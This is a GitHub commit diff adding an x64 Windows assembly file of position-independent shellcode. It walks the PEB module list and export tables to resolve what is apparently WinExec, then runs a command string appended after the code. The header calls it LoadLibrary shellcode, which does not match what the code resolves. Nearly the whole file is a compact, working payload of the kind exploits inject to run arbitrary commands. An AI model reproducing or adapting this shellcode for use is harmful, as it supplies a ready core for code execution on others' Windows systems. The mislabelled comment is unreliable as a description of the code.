1+ ;
2+ ; Copyright © 2017 Odzhan. All Rights Reserved.
3+ ;
4+ ; Redistribution and use in source and binary forms, with or without
5+ ; modification, are permitted provided that the following conditions are
6+ ; met:
7+ ;
8+ ; 1. Redistributions of source code must retain the above copyright
9+ ; notice, this list of conditions and the following disclaimer.
10+ ;
11+ ; 2. Redistributions in binary form must reproduce the above copyright
12+ ; notice, this list of conditions and the following disclaimer in the
13+ ; documentation and/or other materials provided with the distribution.
14+ ;
15+ ; 3. The name of the author may not be used to endorse or promote products
16+ ; derived from this software without specific prior written permission.
17+ ;
18+ ; THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
19+ ; IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
20+ ; WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21+ ; DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
22+ ; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
23+ ; (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24+ ; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
25+ ; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
26+ ; STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
27+ ; ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
28+ ; POSSIBILITY OF SUCH DAMAGE.
29+ ;
30+
31+ ; 127 byte LoadLibrary shellcode for x64 windows
32+ ; Uses the Export Address Table
33+ ; odzhan
34+
35+ %include "include.inc"
36+
37+ bits 64
38+
39+ pushx rsi , rdi , rbx , rbp
40+ sub rsp , 28h
41+ jmp load_cmd
42+ init_cmd:
43+ pop r10
44+ push TEB.ProcessEnvironmentBlock
45+ pop r11
46+ mov rax , [ gs : r11 ]
47+ mov rax , [ rax + PEB.Ldr ]
48+ mov rdi , [ rax + PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink ]
49+ jmp scan_dll
50+ next_dll:
51+ mov rdi , [ rdi + LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink ]
52+ scan_dll:
53+ mov rbx , [ rdi + LDR_DATA_TABLE_ENTRY.DllBase ]
54+ test rbx , rbx
55+ jz exit_load
56+
57+ mov eax , [ rbx + IMAGE_DOS_HEADER.e_lfanew ]
58+ add eax , r11d
59+ mov ecx , [ rbx + rax + IMAGE_NT_HEADERS.OptionalHeader + \
60+ IMAGE_OPTIONAL_HEADER.DataDirectory + \
61+ IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
62+ IMAGE_DATA_DIRECTORY.VirtualAddress - \
63+ TEB.ProcessEnvironmentBlock ]
64+ jecxz next_dll
65+ lea rsi , [ rbx + rcx + IMAGE_EXPORT_DIRECTORY.NumberOfNames ]
66+ lodsd
67+ xchg eax , ecx
68+ jecxz next_dll ; skip if no names
69+ ; rdx = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions
70+ lodsd
71+ xchg eax , edx
72+ add rdx , rbx ; rax = RVA2VA(rdx, rbx)
73+ ; rbp = IMAGE_EXPORT_DIRECTORY.AddressOfNames
74+ lodsd
75+ xchg eax , ebp
76+ add rbp , rbx ; rbp = RVA2VA(rbp, rbx)
77+ ; rax = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
78+ lodsd
79+ xchg eax , esi
80+ add rsi , rbx ; rsi = RVA(rax, rbx)
81+ find_api:
82+ mov eax , [ rbp + rcx * 4 - 4 ] ; eax = RVA of API string
83+ cmp dword [ rax + rbx ], 'WinE'
84+ loopne find_api ; --ecx && Load not found
85+ jnz next_dll
86+ movzx eax , word [ rsi + rcx * 2 ] ; eax = AddressOfNameOrdinals[eax]
87+ mov ecx , [ rdx + rax * 4 ] ; ecx = base + AddressOfFunctions[eax]
88+ add rbx , rcx
89+ push r10
90+ pop rcx
91+ push SW_SHOWNORMAL
92+ pop rdx
93+ call rbx
94+ exit_load:
95+ add rsp , 28h
96+ popx rsi , rdi , rbx , rbp
97+ ret
98+ load_cmd:
99+ call init_cmd
100+ ; command goes here
101+
0 commit comments